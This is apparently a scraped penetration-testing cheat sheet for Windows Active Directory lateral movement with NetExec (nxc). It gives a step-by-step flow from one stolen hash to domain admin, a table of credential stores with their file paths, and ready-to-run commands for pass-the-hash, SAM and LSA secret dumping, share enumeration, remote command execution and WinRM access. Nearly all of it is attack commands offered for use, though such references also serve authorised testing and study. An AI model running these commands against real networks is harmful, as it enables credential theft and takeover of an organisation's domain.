# Attack Flowplain text ⧉ copy
Obtain hash or password (SAM dump / Responder / cracking)
→ Pass across subnet — nxc smb <subnet>/24
→ Review for Pwn3d! (admin access)
→ Dump SAM/LSA on Pwn3d! hosts
→ Pass new hashes across subnet — repeat
→ Continue until DA hash or DA access obtained # What Can Be DumpedTarget Location Value SAM C:\Windows\System32\config\SAMLocal account NTLM hashes — local admin often reused domain-wide LSA Secrets HKLM\SECURITY\Policy\SecretsCached domain creds, service account passwords NTDS.dit C:\Windows\NTDS\NTDS.dit on DCEvery domain account hash (see DCSync section) LSASS In-memory process Active session creds — NTLM, Kerberos tickets, sometimes plaintext
# Using a Passwordbash ⧉ copy
nxc smb < ip/cid r > -u < usernam e > -p < passwor d > -d < domain.loca l >
nxc smb < target-i p > -u < usernam e > -p < passwor d > -d < domain.loca l > # Pass the Hashbash ⧉ copy
# Local account hash (e.g. local Administrator from SAM dump)
nxc smb < ip/cid r > -u < usernam e > -H < has h > --local-auth
# Domain account hash
nxc smb < ip/cid r > -u < usernam e > -H < has h > -d < domain.loca l > # Dump SAM (requires admin / Pwn3d!)bash ⧉ copy
nxc smb < ip/cid r > -u < usernam e > -H < has h > --local-auth --sam
nxc smb < target-i p > -u < usernam e > -H < has h > --local-auth --sam # Dump LSA Secrets (requires admin / Pwn3d!)bash ⧉ copy
nxc smb < ip/cid r > -u < usernam e > -H < has h > --local-auth --lsa
nxc smb < target-i p > -u < usernam e > -H < has h > --local-auth --lsa # Enumerate Sharesbash ⧉ copy
nxc smb < ip/cid r > -u < usernam e > -H < has h > --local-auth --shares
nxc smb < ip/cid r > -u < usernam e > -p < passwor d > -d < domain.loca l > --shares # Execute Commands (requires admin / Pwn3d!)bash ⧉ copy
nxc smb < ip/cid r > -u < usernam e > -H < has h > --local-auth -x "whoami"
nxc smb < ip/cid r > -u < usernam e > -H < has h > --local-auth -X "Get-LocalGroupMember Administrators" # WinRMbash ⧉ copy
nxc winrm < ip/cid r > -u < usernam e > -H < has h >
nxc winrm < ip/cid r > -u < usernam e > -p < passwor d > -d < domain.loca l > # Reading nxc Outputplain text ⧉ copy
SMB 192.168.1.100 445 WORKSTATION01 [+] DOMAIN\username (Pwn3d!) ← local admin, pivot here
SMB 192.168.1.101 445 WORKSTATION02 [+] DOMAIN\username ← valid creds, no admin
SMB 192.168.1.102 445 WORKSTATION03 [-] DOMAIN\username ← auth failed Output Meaning [+] with Pwn3d!Local admin — pivot here [+] without Pwn3d!Valid creds, no admin [-]Auth failed
# NXC Databasebash ⧉ copy
nxc db
nxc creds